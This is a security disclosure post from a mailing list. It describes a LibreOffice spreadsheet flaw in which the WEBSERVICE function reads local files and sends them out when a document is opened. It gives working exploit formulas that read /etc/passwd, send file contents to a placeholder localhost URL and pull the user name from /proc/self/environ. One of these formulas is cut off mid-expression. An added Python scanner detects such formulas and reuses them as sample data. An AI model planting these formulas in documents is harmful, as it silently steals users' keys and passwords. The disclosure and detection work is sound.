Hello,
After learning that the reported vulnerability was already known to the developers,
but that they did not include the trivial fix in 6.0, but (as the developer said; I did
not check it myself) included it in 5.4.5 (which means this is a silently fixed
vulnerability), with a month's lag between updates, I think it is more correct to
fully disclose it.
PoC: https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure
# Vulnerability description
## First part
LibreOffice supports COM.MICROSOFT.WEBSERVICE function:
https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4
The function is used to obtain data by URL, usually as:
=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")
In the original documentation:
For protocols that are not supported, such as ftp:// or file://,
WEBSERVICE returns the #VALUE! error value.
In LibreOffice, these restrictions are not implemented.
## Second part
By default the cells are not updated, but if you specify the cell type as something like
~error, then the cell will be updated when you open the document.
# Exploitation
To read a file you just need:
=WEBSERVICE("/etc/passwd")
This function can also be used to send a file:
=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))
For successful operation, you need to send the files of the current user, so
you need to retrieve the current user's home path.
=MID(WEBSERVICE("/proc/self/environ"), FIND("USER=",
WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0),
WEBSERVICE("/proc/self/environ"), FIND("USER=",
WEBSERVICE("/proc/self/environ")))-FIND("USER=",
You can also parse other files, like ~/.ssh/config or something like that.
For formats other than LibreOffice Calc you just need to embed a Calc object into the
other document (I checked that it works).
# Impact
It is easy to send any files with keys, passwords and anything else. 100%
success rate, absolutely silent, supports all modern versions of LibreOffice and
may be embedded in almost all formats supported by LO.
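The following is an added detection example, written by the editor and not part of the author's post or PoC. It scans an ODF document the way a mail gateway or file scanner would, looking for the two patterns described above: a WEBSERVICE call whose literal target is not an http(s) URL (the case Excel rejects with #VALUE!), and a WEBSERVICE call nested inside another one (the exfiltration pattern). It assumes the standard ODF layout (a zip with `content.xml`, cell formulas stored in the `table:formula` attribute with an `of:=` prefix) and that embedded Calc objects in other formats sit in sub-directories such as `Object 1/`, which is why every `content.xml` entry in the archive is scanned. The sample document is constructed in memory; it is not a real file from the disclosure.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# ODF namespace that carries the cell formula attribute (table:formula).
TABLE_NS = "urn:oasis:names:tc:opendocument:xmlns:table:1.0"
FORMULA_ATTR = "{%s}formula" % TABLE_NS

# WEBSERVICE(...) call whose first argument is a string literal; captures the literal.
# Matches the COM.MICROSOFT.WEBSERVICE spelling LibreOffice uses as well as plain WEBSERVICE.
WEBSERVICE_LITERAL = re.compile(r'WEBSERVICE\(\s*"([^"]*)"', re.IGNORECASE)
# WEBSERVICE call whose argument expression itself contains another WEBSERVICE call
# (local file content fed into a remote request). Heuristic: no nested parentheses in between.
NESTED_WEBSERVICE = re.compile(r'WEBSERVICE\([^()]*WEBSERVICE\(', re.IGNORECASE)
# Only targets Excel would accept; anything else (a path, file://, ftp://) is flagged.
ALLOWED_SCHEME = re.compile(r'https?://', re.IGNORECASE)


def classify_formula(entry, formula):
    """Return a list of (entry, kind, detail) findings for one cell formula."""
    findings = []
    for literal in WEBSERVICE_LITERAL.findall(formula):
        if not ALLOWED_SCHEME.match(literal):
            findings.append((entry, "non-http-target", literal))
    if NESTED_WEBSERVICE.search(formula):
        findings.append((entry, "nested-webservice", formula))
    return findings


def scan_content_xml(entry, xml_bytes):
    """Walk every element of a content.xml and classify each table:formula attribute."""
    findings = []
    root = ET.fromstring(xml_bytes)
    for element in root.iter():
        formula = element.get(FORMULA_ATTR)
        if formula:
            findings.extend(classify_formula(entry, formula))
    return findings


def scan_document(doc_bytes):
    """Scan an ODF zip: the top-level content.xml plus any embedded object's content.xml
    (assumption: embedded Calc objects live in sub-directories such as 'Object 1/')."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        for name in zf.namelist():
            if name == "content.xml" or name.endswith("/content.xml"):
                findings.extend(scan_content_xml(name, zf.read(name)))
    return findings


def make_content_xml(formulas):
    """Constructed minimal content.xml with one row of formula cells (sample data)."""
    cells = "".join(
        '<table:table-cell table:formula="of:={}" office:value-type="string"/>'.format(
            escape(f, {'"': "&quot;"})
        )
        for f in formulas
    )
    return (
        '<office:document-content'
        ' xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"'
        ' xmlns:table="{ns}">'
        '<office:body><office:spreadsheet><table:table table:name="Sheet1">'
        '<table:table-row>{cells}</table:table-row>'
        '</table:table></office:spreadsheet></office:body>'
        '</office:document-content>'
    ).format(ns=TABLE_NS, cells=cells).encode("utf-8")


def build_sample_document():
    """Constructed in-memory document: a benign HTTPS lookup, a local file read,
    the nested pattern, and one more local read inside an embedded object."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.spreadsheet")
        zf.writestr("content.xml", make_content_xml([
            'COM.MICROSOFT.WEBSERVICE("https://example.com/api")',
            'COM.MICROSOFT.WEBSERVICE("/etc/passwd")',
            'COM.MICROSOFT.WEBSERVICE("http://localhost:6000/?q=" & COM.MICROSOFT.WEBSERVICE("/etc/passwd"))',
        ]))
        zf.writestr("Object 1/content.xml", make_content_xml([
            'COM.MICROSOFT.WEBSERVICE("/proc/self/environ")',
        ]))
    return buf.getvalue()


# Scan the constructed sample; four findings expected (three in content.xml, one embedded).
FINDINGS = scan_document(build_sample_document())

if __name__ == "__main__":
    for entry, kind, detail in FINDINGS:
        print("%s: %s: %s" % (entry, kind, detail))
```

The scheme check deliberately mirrors the behaviour the author quotes from the original documentation, so a benign https lookup produces no finding while any path-like target does. Because formulas are only evaluated when the cell is recalculated, the presence of such a formula is the right thing to alert on; whether the auto-update trick on the cell type is also present is a secondary signal and is not checked here.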
Attachment:
signature.asc
Description: PGP signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/